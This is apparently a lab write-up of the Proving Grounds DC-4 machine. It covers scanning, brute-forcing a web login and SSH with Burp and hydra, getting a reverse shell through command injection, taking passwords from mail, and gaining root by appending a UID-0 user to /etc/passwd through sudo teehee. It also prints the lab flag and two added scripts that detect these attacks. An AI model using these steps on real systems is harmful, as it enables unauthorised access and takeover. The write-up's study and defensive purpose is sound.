OSCP - Proving Grounds - DC-4

Published: 2024/12/17 18:08:05

Key points

  • Password brute-forcing
  • Searching for files that may contain passwords
  • Privilege escalation by inserting a new user into /etc/passwd

Steps

Start with an nmap scan. It is fairly straightforward: only ports 80 and 22 are open. Although port 22 has a vulnerability, it is of little help in our current situation, so the focus is on port 80.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:37 UTC
Nmap scan report for 192.168.52.195
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10

Run nikto and a directory brute force against port 80, which gives the following:

C:\home\kali\Documents\OFFSEC\play\DC-4> cat nikto.txt 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.52.195
+ Target Hostname:    192.168.52.195
+ Target Port:        80
+ Start Time:         2024-12-13 09:38:25 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-12-13 09:38:38 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.172.195
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/command.php          (Status: 302) [Size: 704] [--> index.php]
/css                  (Status: 301) [Size: 170] [--> http://192.168.172.195/css/]
/images               (Status: 301) [Size: 170] [--> http://192.168.172.195/images/]
/index.php            (Status: 200) [Size: 506]
/login.php            (Status: 302) [Size: 206] [--> index.php]
/logout.php           (Status: 302) [Size: 163] [--> index.php]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
===============================================================

So port 80 serves a PHP application whose main files are command.php, index.php and login.php, with login.php being the login page.

Open Burp Suite and brute-force the login form; admin / happy turns out to be a valid username and password.

After logging in we are redirected to command.php.

Looking at the request, it actually sends a Linux command as a parameter, so we send this request to Repeater, modify it, and create a reverse shell.

Through the reverse shell we can see old-passwords.bak; download it locally and use it as a wordlist for brute-forcing.

C:\home\kali\Documents\OFFSEC\play\DC-4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.206] from (UNKNOWN) [192.168.172.195] 48660
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/usr/share/nginx/html
cd /home/jim
ls -l
total 16
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw-r--r-- 1 root root   33 Dec 13 21:42 local.txt
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwxrwxrwx 1 jim  jim   190 Dec 13 22:07 test.sh
cd backups
ls
old-passwords.bak

Brute-forcing gives the password jibril04:

C:\home\kali\Documents\OFFSEC\play\DC-4> hydra -l jim -P password_list.txt ssh://192.168.172.195       
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-13 20:09:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.172.195:22/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 41 to do in 00:01h, 13 active
[22][ssh] host: 192.168.172.195   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found

With this password we can SSH into the server as jim, and the login banner tells me I have mail.

C:\home\kali\Documents\OFFSEC\play\DC-4> ssh jim@192.168.172.195             
The authenticity of host '192.168.172.195 (192.168.172.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.172.195' (ED25519) to the list of known hosts.
jim@192.168.172.195's password: 
......
......
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ sudo -l
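
As an added defender-side example (not part of the original writeup), the following script looks in sshd log lines for exactly the pattern the hydra run above produces: a burst of failed passwords for one account from one source, followed by an accepted login from that same source. It assumes the Debian-style sshd syslog format; the log lines and the threshold are constructed.

```shell
#!/bin/sh
# Added example, not from the original writeup: detect the hydra pattern seen above
# in sshd logs - many "Failed password" lines for one account from one source,
# then an "Accepted" login from that same source. Log lines below are constructed.

SAMPLE_AUTH_LOG='Dec 13 20:09:24 dc-4 sshd[2101]: Failed password for jim from 192.168.45.206 port 48660 ssh2
Dec 13 20:09:24 dc-4 sshd[2102]: Failed password for jim from 192.168.45.206 port 48662 ssh2
Dec 13 20:09:25 dc-4 sshd[2103]: Failed password for jim from 192.168.45.206 port 48664 ssh2
Dec 13 20:09:25 dc-4 sshd[2104]: Failed password for jim from 192.168.45.206 port 48666 ssh2
Dec 13 20:09:26 dc-4 sshd[2105]: Failed password for jim from 192.168.45.206 port 48668 ssh2
Dec 13 20:10:41 dc-4 sshd[2190]: Accepted password for jim from 192.168.45.206 port 48910 ssh2
Dec 13 20:12:03 dc-4 sshd[2231]: Failed password for root from 10.0.0.9 port 51002 ssh2
Dec 13 20:30:00 dc-4 sshd[2300]: Accepted publickey for charles from 192.168.0.100 port 40001 ssh2'

# ssh_bruteforce_report FILE THRESHOLD
# Prints one finding per line:
#   bruteforce <ip> <failures>          source with at least THRESHOLD failed passwords
#   compromised <ip> <user> <failures>  accepted login from a source already at/over THRESHOLD
# Exit status is 1 if anything was reported, 0 if the log is clean.
ssh_bruteforce_report() {
    awk -v thr="$2" '
        # Return the token following KEY on the current line ("" if absent).
        function field_after(key,  i) {
            for (i = 1; i < NF; i++) if ($i == key) return $(i + 1)
            return ""
        }
        /sshd\[[0-9]+\]: Failed password for / { fails[field_after("from")]++ }
        /sshd\[[0-9]+\]: Accepted (password|publickey) for / {
            ip = field_after("from")
            if (fails[ip] >= thr) { print "compromised " ip " " field_after("for") " " fails[ip]; found = 1 }
        }
        END {
            for (ip in fails) if (fails[ip] >= thr) { print "bruteforce " ip " " fails[ip]; found = 1 }
            exit (found ? 1 : 0)
        }
    ' "$1"
}

# Run against the constructed sample with a threshold of 3 failures.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_AUTH_LOG" > "$tmp"
ssh_bruteforce_report "$tmp" 3 || echo "review the flagged source and rotate the affected account's password"
rm -f "$tmp"
```

On a real host point it at /var/log/auth.log; a "compromised" line is the signal that a guessed password was actually used, which a plain failure count would not show.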

I looked at the mbox file and did not find much, but it can serve as a clue to search for other mail files. So we upload linpeas.sh and run it, which finds the lead:

╔══════════╣ Mails (limit 50)
9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/mail/jim
7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/mail/www-data
9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/spool/mail/jim
7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/spool/mail/www-data

Reading it gives us charles's password:

jim@dc-4:/var/mail$ cat jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

So we use this password to switch to charles, and find that charles can run /usr/bin/teehee with sudo:

charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

From observation and experimentation, teehee behaves like tee: it takes input from the terminal and writes it to a file. Since it runs as root via sudo, we can use this to append a record to /etc/passwd.

charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

First generate a password hash, then append the following line to /etc/passwd and switch to the tim user to complete the privilege escalation:

charles@dc-4:~$ openssl passwd 1234
HQpXGqbwWyrdo
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
charles@dc-4:~$ su tim
Password: 
root@dc-4:/home/charles#  cat /root/proof.txt
eb471b16059fc83e6f3cf3900b73be38
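
As an added example, not from the original writeup, here is a check for the artefact this escalation leaves behind: a second UID-0 account with a usable hash in /etc/passwd itself rather than in /etc/shadow. The sample passwd content is constructed and includes the tim line from above; the check goes beyond that single case by also flagging shared UIDs and empty password fields.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a passwd-format file for the
# artefact left by "sudo teehee -a /etc/passwd" above - an extra UID-0 account whose
# password hash sits in field 2 instead of in /etc/shadow. Sample content is constructed.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash'

# audit_passwd [FILE]   (defaults to /etc/passwd)
# Prints one finding per line, "<kind> <user>":
#   uid0    UID 0 account other than root
#   hash    field 2 holds a hash rather than "x" (shadowed) or a lock marker ("*", "!...")
#   nopass  field 2 is empty, so the account has no password at all
#   dupuid  UID already used by an earlier entry
# Exit status is 1 if anything was reported, 0 if the file is clean.
audit_passwd() {
    awk -F: '
        NF != 7                 { print "malformed line-" NR; found = 1; next }
        $3 == 0 && $1 != "root" { print "uid0 " $1; found = 1 }
        $2 == ""                { print "nopass " $1; found = 1 }
        $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "hash " $1; found = 1 }
        ($3 in seen)            { print "dupuid " $1; found = 1 }
                                { seen[$3] = 1 }
        END                     { exit (found ? 1 : 0) }
    ' "${1:-/etc/passwd}"
}

# Run against the constructed sample; on a real host call audit_passwd with no argument.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
audit_passwd "$tmp" || echo "review the flagged entries and find out who could write /etc/passwd"
rm -f "$tmp"
```

A NOPASSWD sudo rule for any tee-like binary, as in the sudo -l output above, is the write path this check is meant to catch after the fact; the sudoers rule itself is the thing to remove.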

Personal assessment

Overall the difficulty is not high, but there are many steps and some detours, especially the login password brute force. Given the network and the performance limits of Burp Suite Community Edition, only a small wordlist is practical; with rockyou it would not finish by tomorrow morning. In an exam I would try to avoid password brute-forcing as far as possible, especially with a large dictionary.


http://www.ppmy.cn/ops/142703.html
